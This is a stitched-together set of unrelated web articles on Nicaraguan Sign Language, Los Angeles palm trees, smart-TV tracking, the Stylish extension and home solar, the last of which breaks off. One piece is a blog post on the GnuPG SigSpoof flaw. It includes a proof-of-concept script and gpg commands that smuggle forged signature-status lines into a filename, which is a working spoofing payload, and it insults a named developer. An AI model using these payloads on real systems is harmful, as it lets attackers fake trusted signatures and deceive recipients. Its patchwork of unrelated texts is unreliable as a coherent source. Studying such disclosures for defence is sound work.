
How Deaf Children in Nicaragua Created a New Language


Of all the changes within Nicaragua to come out of the overthrow of the Somoza regime by the Sandinistas in 1979, perhaps the least anticipated was the birth of a new language. Nicaraguan Sign Language is the only language spontaneously created, without the influence of other languages, to have been recorded from its birth. And though it came out of a period of civil strife, it was not political actors but deaf children who created the language’s unique vocabulary, grammar, and syntax.

When the Sandinista National Liberation Front gained power, they embarked on what has been described as a “literacy crusade,” developing programs to promote fluency in reading Spanish. One such initiative was opening the first public school for deaf education, the Melania Morales Special Education Center, in Managua’s Barrio San Judas. According to Ann Senghas, a professor of psychology at Barnard College who has studied NSL, it was the first time in the history of the country that deaf children were brought together in large numbers.

These children, who ranged in age from four to 16, had no experience with sign language beyond the “home signs” they used with family members to communicate broad concepts. American Sign Language, which has existed since the early 19th century, is used throughout the Americas and is often considered a “lingua franca” among deaf people whose first sign language is a national or regional one. But the first Nicaraguan deaf school did not use ASL or any signs at all. Instead, they focused on teaching children to speak and lip-read Spanish.


This educational strategy, known as “oralism,” has long been a subject of debate in deaf education, one that was particularly fierce in the United States where ASL originated. Around the turn of the 20th century, some deaf-education advocates believed that the ability to speak and lip-read a language would be more beneficial to deaf individuals than “manualism,” communication via sign language. By learning English, they argued, deaf individuals would be able to fully participate in U.S. society.

English immersion for the deaf was part of a wider effort, epitomized by the eugenics movement, to stamp out differences within the American population. Among the most vocal proponents of eugenics when it came to the deaf community was the inventor of the telephone, Alexander Graham Bell. Bell argued that if deaf people were allowed to communicate via sign language, their isolation from the hearing population would lead to more deaf marriages and, consequently, a larger deaf population.

“Oralism, Bell believed, allowed deaf people to leave their educational and cultural corners and participate in society at large,” writes Brian H. Greenwald, professor of history at the deaf institution Gallaudet University, via email. Bell, Greenwald notes, “used oralism as a form of assimilation.” It was a strategy that Bell hoped would eventually lead to the eradication of deafness in American society.

In Managua in the 1980s, too, though free of the influence of eugenicists, the Sandinistas’ focus on Spanish literacy meant that deaf students were immersed in speaking and reading Spanish. But while the country’s deaf children were being taught Spanish inside the classroom, outside the classroom they were spontaneously developing their own method of signed communication.

Though older and younger students attended separate classes during school hours, on buses and playgrounds the children quickly began to select “conventions” for necessary words. Such conventions occur when a community of speakers, who at home may have all used different signs to refer to an object or action, begin to consistently default to using just one, says James Shepard-Kegl. Kegl is co-director of the Nicaraguan Sign Language Project, which administers programs to empower the Nicaraguan deaf community through the use of sign language. “You start building a vocabulary this way,” he says.


All languages have grammar and syntax, but the first children at Managua’s deaf school had no model for how a language worked because they had been isolated from signed, spoken, and written language all their lives, Shepard-Kegl notes. When the children interacted, instead of adapting their signs to fit an existing language, they developed something unique. While the older students had more life experience, it was actually the younger kids that drove the language’s development. “As you get older, your language instincts tend to diminish,” says Shepard-Kegl. “A lot of those older kids weren’t generating grammar the way little kids did. They copied the grammar the little kids generated.”

No one knows exactly how many individuals are needed to generate a new language or what percentage of those individuals need to be young children. Smaller-scale isolated deaf-education programs had existed previously in 20th-century Nicaragua, Shepard-Kegl says, but the critical mass needed to spontaneously develop Nicaraguan Sign Language only occurred with the opening of Melania Morales. Within a few years, teachers and education officials recognized that something incredible was happening at the school and, in 1986, Nicaragua’s Ministry of Education invited the U.S. linguist Judy Kegl to visit as a deaf-education consultant.


For Kegl and the other linguists who accompanied her after the initial visit, the opportunity to identify and study Nicaraguan Sign Language was “extremely rare,” writes Senghas in her 1995 MIT doctoral dissertation, Children’s Contribution to the Birth of Nicaraguan Sign Language, which focuses on the years she spent working with Kegl. (Kegl is today co-director of the Nicaraguan Sign Language Project and married to Shepard-Kegl.) It’s an opportunity that owes much to the birth of NSL occurring in the 1980s, when researchers had access to video cameras and could accurately record exactly what was happening. “To my knowledge,” Senghas writes, “there has not been another case of linguists and psycholinguists documenting the birth of a language on a community-wide scale.”

This is not to say, however, that other independent community-based sign languages never existed. In fact, the linguistic world is rich with a wide variety of mutually unintelligible signed languages. Though American Sign Language and some other widely utilized sign languages, such as Chinese Sign Language and Indo-Pakistani Sign Language, have long histories, they were often inaccessible to deaf families and institutions in rural, mountainous, or politically-charged regions. In order to communicate manually, these communities had to develop their own signed languages. For example, in early-to-mid-20th century Jim Crow-era Raleigh, North Carolina, under-resourced and pedagogically isolated African-American deaf schools independently developed unique languages, says Susan Burch, an American Studies professor at Middlebury College. It’s something that has occurred many times in history.

Nicaraguan Sign Language similarly developed in a vacuum. American Sign Language might have spread into Nicaragua by the 1980s, as it did in neighboring Costa Rica, where it combined with a locally developed sign language in the 1960s. But Nicaragua’s geopolitical isolation kept ASL out of the country, notes Shepard-Kegl. Not only did this allow for the independent creation of Nicaraguan Sign Language, but it helped the nascent form of communication to survive.


Around the world, deaf sign languages, including the one used among African Americans in Raleigh, have disappeared or changed significantly when a more widely used language has entered the region. Linguists refer to this displacement as “linguistic imperialism.”

It is a concept that has generated considerable controversy. Some linguists feel that the “contamination” of a local language by a more globally dominant one results in the marginalization of a native community because it supplants the indigenous form of communication with something from outside. Others believe that when dominant languages arrive, they are appropriated by indigenous communities, often combining with an existing language to create a distinctly local version. Deaf Costa Ricans born prior to the 1960s, for example, primarily use what is referred to as Old Costa Rican Sign Language. When ASL arrived in the country after the 1960s, its appropriation by the deaf community resulted in the creation of New Costa Rican Sign Language (sometimes called Modern Costa Rican Sign Language), around 60 percent of which is made up of ASL signs.

In Nicaragua today, changes in technology and communication have led to the increased use of American Sign Language within the deaf community. While ASL has not replaced the pristine, isolated NSL of the 1980s, which still dominates deaf education there, Nicaraguan Sign Language has begun a natural process of integrating elements of ASL. “Languages, by nature, borrow,” says Shepard-Kegl. “They either borrow or they perish.”

For all that linguists have learned from the study of Nicaraguan Sign Language, perhaps most important is the proof it has provided for a controversial theory of language. In the 1960s, Noam Chomsky suggested that children are born with an innate ability to learn human language. Babies are not given grammar lessons and yet they reliably learn grammar because they have inherent expectations about how languages function, says Shepard-Kegl. Kids “don’t know what the [grammatical] rule is but [they] expect that there is a rule.” In Managua’s first deaf school, there was no model and no one to guide the children in sign language and still a language was created in a way never observed before.


Why Are There Palm Trees in Los Angeles?


Let’s go back in time, to Los Angeles in 1875. Here’s what you see: basically nothing. The town—and “town” is even sort of grand for what it was—has about 8,000 people in it. But here’s something weirder: there are no palm trees. As a matter of fact, there aren’t really any trees at all. This area is just sort of a scrubland desert.

Over the next 50 years, palm trees would become a major transformative force in the development of Los Angeles. This is despite the fact that they don’t really do anything. The trees of urban Los Angeles do not provide shade or fruit or wood. They are lousy at preventing erosion. What they do, and what they did, is stranger: they became symbols.


There is a single species of palm native to the entire state of California, the California fan palm, which is a big one with what looks like a fuzzy beard of brown leaves underneath its green fronds. It’s naturally found around desert oases in the Colorado Desert. (The Colorado Desert is not in Colorado, but is named for the river. Joshua Tree National Park is there.) The native people of that area, the Cahuilla, used it pretty liberally; palm fronds are incredibly strong and heavy, which makes them good for building. But compared with the East Coast palms—there are 12 species native to Florida—the West Coast was, until very recently, basically barren of these trees. Plants. Tall grass things. Wait, what are palms, exactly?

One first weird thing in a very long list of weird things about palms is that they are not really trees. The word “tree” is not a horticultural term—it’s sort of like “vegetable,” in that you can kind of call anything a vegetable—but palms are not at all like the other plants commonly referred to as trees. They don’t have wood, for one thing; the interior of a palm is made up of basically thousands of fibrous straws, which gives them the tensile strength to bend with hard tropical windstorms without snapping. They are monocots, which is a category of plant in which the seed contains only one embryonic leaf; as monocots, they have more in common with grasses like corn and bamboo than they do with an oak or pine tree.

Southern California might not have been rich with trees, but it was rich with money and rich with sunshine. Once the railroads came to Los Angeles, in the 1880s, speculators realized this huge empty sunny place would be a great opportunity to sell land. But how to get people to move way out to the desert? One way was incredibly cheap train tickets; the railroads sold tickets from the Midwest for as little as one dollar. But, as with California ever since, the place had to be marketed.


There are only two palm species native to Europe; one is a little shrub, and the other is restricted to a few Mediterranean islands. Because they were not common, palms have for centuries had a strange pull for people who didn’t grow up around them. “In the Western imagination, palms for a very very long time were associated with that part of the world that, depending on your point of view and your time in history could be called the Orient, or the Far East, or the Middle East, or the Levant, or the Holy Land, or the Ottoman world, or the Turkish world,” says Jared Farmer, the author of the definitive book on California foliage, Trees in Paradise.

Palms grow freely in the Middle East, and this part of the world always had major religious associations for Westerners, most of whom, for a long time, followed Christianity, Judaism, or Islam—all of which have their holiest sites there. Palms themselves are used in those religions: Jews wave them in rituals during Sukkot, and Christians carry them on Palm Sunday, often folded into crosses. The Prophet Mohammed talks about date palms a lot, even if the plant doesn’t have as prominent a role in the rituals of Islam.

The original reason that palms were planted in the New World was for use during Palm Sunday; Catholic missionaries in Florida and California, finding themselves in a place with a hospitable climate for palms, planted them around their missions. But the missionaries are not responsible for the mass of palms in Los Angeles.


Up until the mid- to late-19th century, the French Riviera was sparsely populated. But popular writers began traveling there, and found it was pretty nice. That, coupled with a trendy new health fad in which time in a dry warm climate is supposed to have good effects on the body, increased its popularity. Immediately developers moved there and began building it up. Palms, already a symbol of warmth from the Middle East, were ideal for this kind of rapid development.

Remember how palms aren’t like other trees? One way is that they’re outrageously easy to move around: they don’t have elaborate root systems like oak trees, but instead a dense yet small root ball. This can be pretty easily dug up and transported, then planted, and palms are not particular about where they are, as long as they have sun and water. To make things easier for developers, palms, being more like grasses than trees, don’t demonstrate all that much difference between individuals; one Mexican fan palm is pretty much like the next. And if you’re a developer, consistency and ease of transportation is a fantastic combination: you can line the streets with them, or plant one on each side of an entrance! And it’s cheap and easy and looks festive. Plus, it has this preexisting association in the minds of your customers (who, in the case of the early French Riviera, were mostly British) with warmth and exoticism.

Palms, though they weren’t native to the Riviera, became indelibly associated with it. And the American developers eyeing Southern California got some ideas. Hey, they thought. This big chunk of desert-y scrubland we own is not that dissimilar from the Mediterranean sites of the Riviera. What if we took a page from their book, and started branding Los Angeles?


Los Angeles, for what it’s worth, wasn’t the only place to try copying the French Riviera. The British tried it too, in a place called Torbay, although even in the far south of England it’s just not warm enough for palms to really thrive. They did their best, though, with a palm called the New Zealand cabbage palm, planted all over the area. It’s basically a shrub.

Anyway, palms took off as a symbol of wealth, luxury, nice weather, vacation. The ease of growing them in containers meant that palms were found on luxury ships like the Titanic and Lusitania. Robber barons, fancy hotels, and magnates in San Francisco—a much older city than Los Angeles—planted them in “palm courts,” a sort of atrium/ballroom featuring lots of palms and probably a string quartet.

“What LA adds to that, which no city, no people had ever thought to do before, and maybe for good reason, is to plant palms systematically as street trees,” says Farmer. The young city, wanting to attract people to a world of sunshine and cars, planted tens of thousands of palm trees. And they weren’t just on big boulevards: Los Angeles planted them everywhere. Tiny residential streets, parks, anywhere. Places designed for tourists—boardwalks, beaches, wealthy hills, even sports arenas like Staples Center, where the Lakers and Clippers basketball teams play—were especially tended to. And they made sure the palms were watered.


Palm trees weren’t the only non-natives that the early planners of Los Angeles planted. They also planted lots of citrus trees, pepper trees, and eucalyptus, all of which were supposed to evoke this Mediterranean feel. But it was the palms that really took off.

This experiment yielded some very strange results. The palms thrived in Los Angeles—Farmer described seeing them growing in cracks in the asphalt in abandoned lots—and one species in particular, the Mexican fan palm, grew enormous. The Mexican fan palm is native to Northern Mexico; it’s that incredibly tall skinny one with the little fronds high up above. “Nobody knew they would grow so tall; they grow taller in LA than they would in the wild. They're the tallest palms in the history of the world, at least that we know of,” says Farmer.

They are, in fact, taller than most buildings in Los Angeles. The city has always been sprawling and low-slung, with few buildings over two stories tall. It spread horizontally rather than vertically, partially due to the cheap abundant land and partially because Los Angeles was always an automotive city. Unlike in other cities, the great skyscrapers of Los Angeles are not huge buildings: they’re trees.


Once the palms were firmly ensconced in Los Angeles, the movie and TV industry popularized them. The palms, despite not being native to LA and in fact only having recently arrived there, became the most iconic image of the city. Every awards show, every red carpet, every movie and show shot in Southern California included palm trees. The city expanded like crazy; the population went from 11,000 in 1880 to over 1.2 million only 50 years later.

Urban trees do actually have jobs, besides just looking nice: they provide shade, reduce heat, clean the air, some prevent erosion, and some produce an edible or useful material. Palms in Los Angeles do not do any of this. Their job was not to be good urban trees; it was to create an image of a new kind of city and convince people from elsewhere to come to Los Angeles. They succeeded at that! But with the first batch of trees now dying out due to old age and an array of pests and diseases, Los Angeles is making some changes. Replacement palms are more likely to be drought-tolerant and provide more shade, like the Chilean palm. But, says Farmer, Los Angeles is not likely to ever let palms completely vanish.


Smart TVs in Millions of U.S. Homes Track Everything Users Watch


Sapna Maheshwari, New York Times:

Still, David Kitchen, a software engineer in London, said he was startled to learn how Samba TV worked after encountering its opt-in screen during a software update on his Sony Bravia set.

The opt-in read: “Interact with your favorite shows. Get recommendations based on the content you love. Connect your devices for exclusive content and special offers. By cleverly recognizing onscreen content, Samba Interactive TV lets you engage with your TV in a whole new way.”

[…]

“The thing that really struck me was this seems like quite an enormous ask for what seems like a silly, trivial feature,” Mr. Kitchen said. “You appear to opt into a discovery-recommendation service, but what you’re really opting into is pervasive monitoring on your TV.”

[…]

Jeffrey Chester, executive director of the Center for Digital Democracy, said few people review the fine print in their zeal to set up new televisions. He said the notice should also describe Samba TV’s “device map,” which matches TV content to mobile gadgets, according to a document on its website, and can help the company track users “in their office, in line at the food truck and on the road as they travel.”

Do people truly want to be tracked for advertising purposes by nearly every device that they interact with? Survey after survey for years has indicated that they do not, yet we seem to have shrinking opportunities to object to it. Nearly every TV you’ll find at an electronics store today is a smart TV, and many of them have some form of this kind of tracking built in. The number of ways we’re being tracked on the web has exploded, and the number of companies that trade and collect that information in bulk keeps going up.

This is all buried in multi-thousand-word privacy policies that are not reasonable for the average user to read and interpret correctly. This is one reason I’m so supportive of GDPR — even though it doesn’t adequately regulate behavioural data collection, it does at least require full disclosure of privacy-intrusive practices to allow users more control over the sharing of their data.

Technology companies are increasingly not operating in users’ best interests because users have few options besides disconnecting entirely.

Maheshwari, continued:

The Times is among the websites that allow advertisers to use data from Samba to track if people who see their ads visit their websites, but a Times spokeswoman, Eileen Murphy, said that the company did that “simply as a matter of convenience for our clients” and that it was not an endorsement of Samba TV’s technology.

As I wrote in April, website administrators have a responsibility to their users — and, in the Times’ case especially, their paying subscribers — to be careful with their website’s third-party data collection and sharing practices. Their agreement with Samba is an implicit endorsement that advertisers can target their users with data collected in an ethically-dubious manner.

zwol: I’m really not looking forward to the inevitable day when I have to replace my nice reliable dumb TV, purchased 2008. It only ever gets used as a computer monitor so maybe I can just buy a computer monitor.

MotherHydra: I hope monitors get big enough. I still haven't seen black levels on par with Panasonic's plasma sets.

Pretty Bad {Protocol,People}


tl;dr: This vulnerability affects GnuPG and several plugins and wrapper libraries, including Vinay Sajip’s “python-gnupg” which I rewrote many years ago after finding a shell injection vulnerability in his code. His code is vulnerable to SigSpoof; mine isn’t.

Markus Brinkmann, a NeoPG developer, wrote about a recent signature spoofing vulnerability in GnuPG which carried over into several downstream plugins and wrapper libraries—largely due to GnuPG’s interface design which uses file descriptors, and only file descriptors, to speak a custom, potentially binary but often ASCII, order-dependent line protocol, whose line order, keywords, number of fields, and other details are subject to change between minor point versions of GnuPG. If that sounds like a special hell invented by some sort of unholy crossing between RMS and a rabid howler monkey: welcome to working with (or rather, more likely, around) the Terrible Idea Generator known as the GnuPG development team.
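To make that concrete, here is a minimal sketch of what consuming that status-fd protocol looks like. The "[GNUPG:]" prefix and the GOODSIG/TRUST_FULLY keywords are real GnuPG status keywords; the parsing code itself is illustrative only and is not taken from python-gnupg or any of the affected plugins:

    # Illustrative only: a toy consumer of GnuPG's status-fd line protocol.
    # The keywords are real GnuPG status keywords; this parser is not code
    # from python-gnupg or any other wrapper discussed here.
    def parse_status_lines(raw):
        """Pick out '[GNUPG:] KEYWORD args...' lines from a status stream."""
        events = []
        for line in raw.splitlines():
            if not line.startswith("[GNUPG:] "):
                # With --verbose, ordinary stderr chatter can end up on the
                # same descriptor, which is exactly what SigSpoof abuses.
                continue
            keyword, _, args = line[len("[GNUPG:] "):].partition(" ")
            events.append((keyword, args))
        return events

    sample = (
        "[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\n"
        "gpg: this line is stderr noise, not a status message\n"
        "[GNUPG:] TRUST_FULLY 0 classic\n"
    )
    print(parse_status_lines(sample))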

As previously mentioned, while working with Riseup¹ folks on a project, we found a shell injection vulnerability in Vinay Sajip’s python-gnupg module (the one that installs if you do pip install python-gnupg; mine installs with pip install gnupg). The fix was not merely to remove the shell=True argument passed to subprocess.Popen(), as Vinay believed (and continues to believe), but instead to sanitise all inputs and whitelist the available options. There are hundreds of flags to the gnupg binary. Some flags and options are safe. Others can be, if you carefully sanitise their arguments. Others must be disallowed entirely.
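To give a rough sense of what that whitelisting looks like, here is a simplified sketch. It is not the actual code in my module; the flags shown are real gpg options, but the whitelist is deliberately tiny and the per-argument value sanitisation is omitted:

    # Simplified sketch of option whitelisting before handing arguments to
    # subprocess (and without shell=True).  Not the real python-gnupg code:
    # the whitelist is abbreviated and argument-value sanitisation is omitted.
    import subprocess

    ALLOWED_FLAGS = {"--armor", "--verbose", "--no-options", "--status-fd"}

    def run_gpg(args, stdin_data=b""):
        for arg in args:
            if arg.startswith("-") and arg.split("=", 1)[0] not in ALLOWED_FLAGS:
                raise ValueError("disallowed gpg option: %r" % arg)
        # The argument list goes straight to exec; no shell ever sees it.
        proc = subprocess.Popen(["/usr/bin/gpg2", "--batch"] + list(args),
                                stdin=subprocess.PIPE,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
        return proc.communicate(stdin_data)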

My python-gnupg module isn’t vulnerable to SigSpoof, for several reasons:

  1. --no-options is passed by default. So if you’ve got something stupid in your gpg.conf file, you’ll still be fine while using my Python module.

  2. --verbose is not passed. This means that my library doesn’t have to wade through a mixture of strange stderr and GnuPG status-fd messages on the same file descriptor. You could pass --verbose to it manually, as it is in the list of allowable, whitelisted options, but the exploit still won’t work, which brings us to our next point:

  3. All inputs to, and outputs from, the gnupg binary are sanitised and then forced to conform to whitelists. This means that, even if you did pass --verbose manually, the filename trick won’t work, since filenames may be arbitrary bytes and there’s no way to safely sanitise one.

Amusingly, the front page of Vinay’s current documentation states:


Which beautifully demonstrates that Vinay still doesn’t understand the original bug report. Additionally, not a single line of his original code remains unchanged, as the bulk of it was badly written and contained hidden landmines.

At the time I pointed out the vulnerability, Vinay argued that it wasn’t a bug until a working exploit for a Bitcoin exchange C&C server, which was unfortunately running his code, was released. Vinay released several versions of his library at the time, without making the version controlled repo available, meaning that for each new version he claimed to have “fixed the bug”, I had to diff the tarballs to discover, unsurprisingly, that he had, in fact, not.

I find it difficult to convey how thoroughly unimpressed I am with men like Vinay. I volunteered the work, handed him an explanation and a solution, and was ridiculed, told I was wrong, that I didn’t understand, and ignored. He’s still never credited me by name anywhere for finding the original bug. Men like this make me want to go write closed source code that none of you will ever see, just so that I never have to deal with these GNU/Beardos ever again. Have fun with the bugs, Vinay, they’ll certainly keep coming.

Test it yourself

Here is a script which will print the status-fd output of GnuPG and test a spoofed signature (PoC #1), a spoofed signature plus a falsely encrypted (i.e. appears to have been encrypted to the user, when in fact no encryption was used) message (PoC #2), and an additional method for signature spoofing (PoC #3):

    #!/usr/bin/env python
    #
    # Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
    # is vulnerable to SigSpoof.
    #
    # Authors: isis agora lovecruft 

    from __future__ import print_function

    import gnupg

    # Set the gnupg log level to `--debug-level=guru` (lmao).
    log = gnupg._logger.create_logger(9)
    log.setLevel(9)

    # Create our gpg instance
    gpg = gnupg.GPG(binary="/usr/bin/gpg2")

    poc1msg = '''\
    -----BEGIN PGP MESSAGE-----

    hQIMAwxKj89n7yVcARAAkhbztv+rjtUZx4rSqpvlj8a9g+y+8ZOY8JhBFvJzVAXe
    tnBNDGmIAc9I9ewRgxwsgcCIlUuGYCSgFugWLYVPD+e0tyQwx76mpMZc5wqAMows
    mk2pavdYMD2FGePY9mCVDvpC8ldumVn2dgT0k2IIOVr8w29CRgzP8ONwAyFFr4Gw
    hZ82e+CLKMFOv7Aigp00D1esurNTzFN5MDJZqhQtPpXawexUjrl5GEsPtKLDkKyt
    iOR5HauLLlDPZJXhHqwrqbSKTpKJU9lztmFp3XVom6VgeCiHWcL0mYF2fcbzfJS/
    CjDFZqFmFPGUJSpdgDcGEGsalzk6o8RFtUvvmKtQLN9BglpYkyPXQiO8vCyS4xiN
    D0gjBxVSvvkdS7734FYxePkUDEOTQbPuJ+FzgMN6Jpp8hVopYbefVcU5bNIY4H2P
    9EAHgvX1AT+VtPPt0JxzQ5/UdXK5KE7O7zUtTJIkXd4hGFpWyZp8hTUEgqLHfHUw
    Qlso2hQ+xgqok1ruGRjYk7n48Uw89jYpBXCOJerZeQGrmGWEkuf1vonFVwddM/4p
    msPN9I6Ahf+Uth+U5rFO4Y2G5fk83saa6ZfM9qdZKgLLEOgXmyycAdSAq/vRRe1G
    z9W77qcuIdhi2dA6+CJBqkm97aYNvoQ4Mxt97e7nP5WijXwugumdMQ7oT1upIsbS
    wFQBov2rvuwWsqrw+kbPD+zedi0NP31BohjiEhBamohGkkh8gr4hPmiyJdm0TIfh
    GBo5z35kRQiJZ9DwmgxE+LnVWQvChEJt0NFuC5FqM5bBaOjR5b2QsYn5uZ5AnVTa
    OZj5HBaaZQqZod5FrGpVpmXG2+RThge8dCbx+CDdBWvLq99TppzcN5nGEHYaz41X
    1ZKRcpbUuixBn3juC6HN2iQq9BidAbpVWvTAYD4dH+/aio3fd+3wSCgHQnPRzxg9
    5YaF6XbFYO8ceruOmnzYYEQTBRmlrBbnaug/cDa5Yq4HIWDHRTR9/aK4Y9rcYsoK
    Jm+7ujLey3TsI9qMs3cbcmsZbnXm+v3uDLvGBofG/dAjqVvm074=
    =UN+a
    -----END PGP MESSAGE-----
    '''

    result1 = gpg.verify(poc1msg)
    print("[poc1] Was the spoofed signature valid? %r" % result1.valid)

    poc2msg = '''\
    -----BEGIN PGP MESSAGE-----

    y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
    IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
    RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
    CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
    W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
    QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
    b3QgdG9tb3Jyb3cgMTBhbS4K
    =Qs3t
    -----END PGP MESSAGE-----
    '''

    result2 = gpg.decrypt(poc2msg)
    print("[poc2] Was the spoofed signature and encryption valid? %r"
          % result2.valid)

    poc3msg = '''\
    -----BEGIN PGP MESSAGE-----

    owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
    79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
    KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
    O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
    mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
    =zQV0
    -----END PGP MESSAGE-----
    '''

    result3 = gpg.verify(poc3msg)
    print("[poc3] Was the spoofed signature valid? %r" % result3.valid)

The GnuPG blobs were generated with (via Markus Brinkmann’s suggestions):

## PoC #1
echo 'Please send me one of those expensive washing machines.' | \
gpg --armor -r a3adb67a2cdb8b35 --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

## PoC #2
echo "See you at the secret spot tomorrow 10am." | \
gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

## PoC #3
echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]
'\''msg'`" > poc3.msg

Again, not vulnerable, for all the reasons described above.

Additionally, if Vinay had actually understood and fixed the root cause of the original shell injection vulnerability six years ago, his library likely wouldn’t be vulnerable, yet again, today. But of course, the GnuPG community, just like upstream, really only takes patches from men, so it’s neither my problem nor concern that they seem to continually discover new and innovative ways to fuck themselves and their users over.

Please don’t

If you’re a developer thinking of making a new tool or product based on the OpenPGP protocol: please don’t. Literally use anything else. I wrote my version of python-gnupg because, at the time, the project I worked on wanted to make transparently encrypting remailers, i.e. middleware boxes run by an email service provider which users register their encryption keys with, which would—upon seeing a plaintext email to another of the provider’s users—automatically encrypt the email to the user. We used GnuPG for this. This was a mistake, in my opinion, and if I had to do the project again, I would do it entirely differently.

If you’re a developer thinking you can write a less shitty version of GnuPG: please don’t. RFC4880 was a mistake and needs to die in a fire. Also nobody under thirty actually uses email for anything other than signing up for services.

If you’re a user or potential user of GnuPG: please don’t. Try using tools with safer, constant-time cryptographic implementations, better code, nicer and more inclusive development teams, and a better overall user experience, like Signal.

If you’re considering getting into GnuPG development: please don’t. Especially if you’re non-cis-male identified, it’s going to be a complete and infuriating waste of your time and talents. Please consider donating your skills to more inclusive projects with fewer moronic assholes.

Moving forward

There isn’t really any path forward. GnuPG and its underlying libgcrypt remain some of the worst C code I’ve ever read. The code isn’t constant time, and numerous attacks have resulted from this, as the developers scurry to jump through hoops of fire to implement yet another variable-timed algorithm they’ve seemingly come up with on the spot which is vulnerable to a dozen more attacks, just not the one from the latest paper. OpenPGP (RFC4880) is one of the worst designs and specifications ever written. I have to spend spots, here and there, of my non-existent free time maintaining a whitelist as the GnuPG developers randomly change their internal, nearly undocumented line protocol, between micro versions. I’d like to not do this. Please, let’s stop pretending this crock of shit provides anything at all “pretty good”: not the cryptographic algorithms, not the code, not the user experience, and certainly not the goddamned IPC design.

There is one way forward: Vinay is annoyed that my library has a similar name, because god forbid a user get tricked into using something more secure. Frankly, I’m sick of Vinay’s trash code being mistaken for mine, and increasingly so, the more vulnerabilities surface in it. So I’ve decided to rename the thing formerly installable with pip install gnupg to pip install pretty_bad_protocol (name thanks to boats’ pbp Rust crate). If you grep for pretty_bad_protocol in a python library which uses gnupg and there are no results, you’ll know someone’s not being very honest about what gnupg has to offer.


¹ I don’t speak for my current or past employers or clients.


i’ve seen a lot of posts about it on mastodon but not over here, so if you use the ‘Stylish’ browser...


i’ve seen a lot of posts about it on mastodon but not over here, so

if you use the ‘Stylish’ browser extension to make websites not look like shit, you need to back up your themes, uninstall it, install Stylus instead, and import your themes into that

stylish got bought by a company that turned it into spyware

stylus works in exactly the same way, and with all the same themes, without spying on you

uninstall stylish


Why a Typical Home Solar Setup Does Not Work With the Grid Down - And What You Can Do About It

During 2017, I saw a lot of news articles talking about how the Evil Power Companies were being Meanie McMean by not letting people with solar panels use them when the grid was down.  The implication (in many news articles) was that these powerless people with solar panels could use them to power their home while the grid was down, if only the evil power company didn't require that solar not work if the grid was down.  The picture painted was one of power company executives, twisting their mustaches, cackling in the glow of their coal fired furnaces, going on about how if they can't deliver power, nobody shall have any power!

That sentiment (and those similar) is somewhere between "showing extreme ignorance of solar" and "actively misleading," depending on the author's knowledge of solar and how it's typically implemented.


So, of course, I'm going to do better.  Because I can.  And because I'm sick of reading that sort of nonsense on the internet.  You will be too, after understanding the issues.


Solar Panels (Are Weird)

Any detailed understanding of solar power requires an understanding of solar panels - because they're the power supply to the entire system.  And, in terms of the available power supplies out there, solar panels are weird.  They're substantially different from anything else, and this impacts how you can use them for grid tied and off grid power.  The biggest problem is that they're very easy to drive into voltage collapse (and therefore power collapse) if you draw beyond the peak power they can produce at the current temperature and illumination.

This is an example IV (current/voltage) curve out of the datasheet from my panels - it's one I had laying around.  The numbers don't matter, because all solar panels work this way - just with different numbers on the scales.


What you're seeing, and what's vital to understand, is that a solar panel will supply a certain current (at any voltage) - up to a certain point.  That current is directly affected by the illumination available (the different W/m^2 curves - that's illumination power per square meter of panel area).  At a certain voltage, the current starts to drop off, and eventually you hit the open circuit voltage (Voc) - the voltage the panel produces when there's no current draw.  The peak power (maximum power point) on the panel comes slightly past the start of the drop in voltage, and the available power drops very rapidly as you go past that point into the voltage collapse.  At both the short circuit point (0V, plenty of amps) and the open circuit voltage (0 amps, plenty of volts), the panels are producing zero usable power.

DigiKey has a great diagram that demonstrates how this works for their particular example panel.  The red curve is the current, and the blue curve is the power.  The dot represents the maximum power point on both curves.  Notice that the power curve to the right of the maximum power point is quite steep - it's not a gentle dropoff.
